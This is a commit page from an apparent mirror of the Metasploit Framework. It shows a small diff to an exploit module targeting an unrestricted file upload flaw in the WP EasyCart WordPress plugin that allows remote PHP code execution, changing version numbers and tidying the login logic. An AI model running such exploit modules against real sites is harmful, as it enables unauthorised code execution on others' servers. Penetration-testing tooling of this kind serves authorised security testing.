infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Correct version numbers and code tidy up

bug/bundler_fix
rastating 2015-01-19 20:59:46 +00:00
parent 8a89b3be28
commit 9d3397901b
1 changed files with 10 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb
View File

@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {}) def initialize(info = {})
super(update_info( super(update_info(
info, info,
'Name' => 'WordPress WP EasyCart 3.0.4 Unrestricted File Upload', 'Name' => 'WordPress WP EasyCart Unrestricted File Upload',
'Description' => %q{WordPress Shopping Cart (WP EasyCart) Plugin for 'Description' => %q{WordPress Shopping Cart (WP EasyCart) Plugin for
WordPress contains a flaw that allows a remote WordPress contains a flaw that allows a remote
attacker to execute arbitrary PHP code. This attacker to execute arbitrary PHP code. This
@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
'DisclosureDate' => 'Jan 08 2015', 'DisclosureDate' => 'Jan 08 2015',
'Platform' => 'php', 'Platform' => 'php',
'Arch' => ARCH_PHP, 'Arch' => ARCH_PHP,
'Targets' => [['wp-easycart < 3.0.16', {}]], 'Targets' => [['wp-easycart < 3.0.17', {}]],
'DefaultTarget' => 0 'DefaultTarget' => 0
)) ))
@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def check def check
check_plugin_version_from_readme('wp-easycart', '3.0.16') check_plugin_version_from_readme('wp-easycart', '3.0.17')
end end
def generate_mime_message(payload, date_hash, name, include_req_id) def generate_mime_message(payload, date_hash, name, include_req_id)
@ -126,13 +126,15 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{peer} - Authenticating using #{username}:#{password}...") print_status("#{peer} - Authenticating using #{username}:#{password}...")
cookie = wordpress_login(username, password) cookie = wordpress_login(username, password)
if use_ec_authentication if !cookie
print_warning("#{peer} - Failed to authenticate with WordPress, attempting upload with EC password next...") if cookie.nil? if use_ec_authentication
print_warning("#{peer} - Failed to authenticate with WordPress, attempting upload with EC password next...")
else
fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress')
end
else else
fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil? print_good("#{peer} - Authenticated with WordPress")
end end
print_good("#{peer} - Authenticated with WordPress") unless cookie.nil?
end end
print_status("#{peer} - Preparing payload...") print_status("#{peer} - Preparing payload...")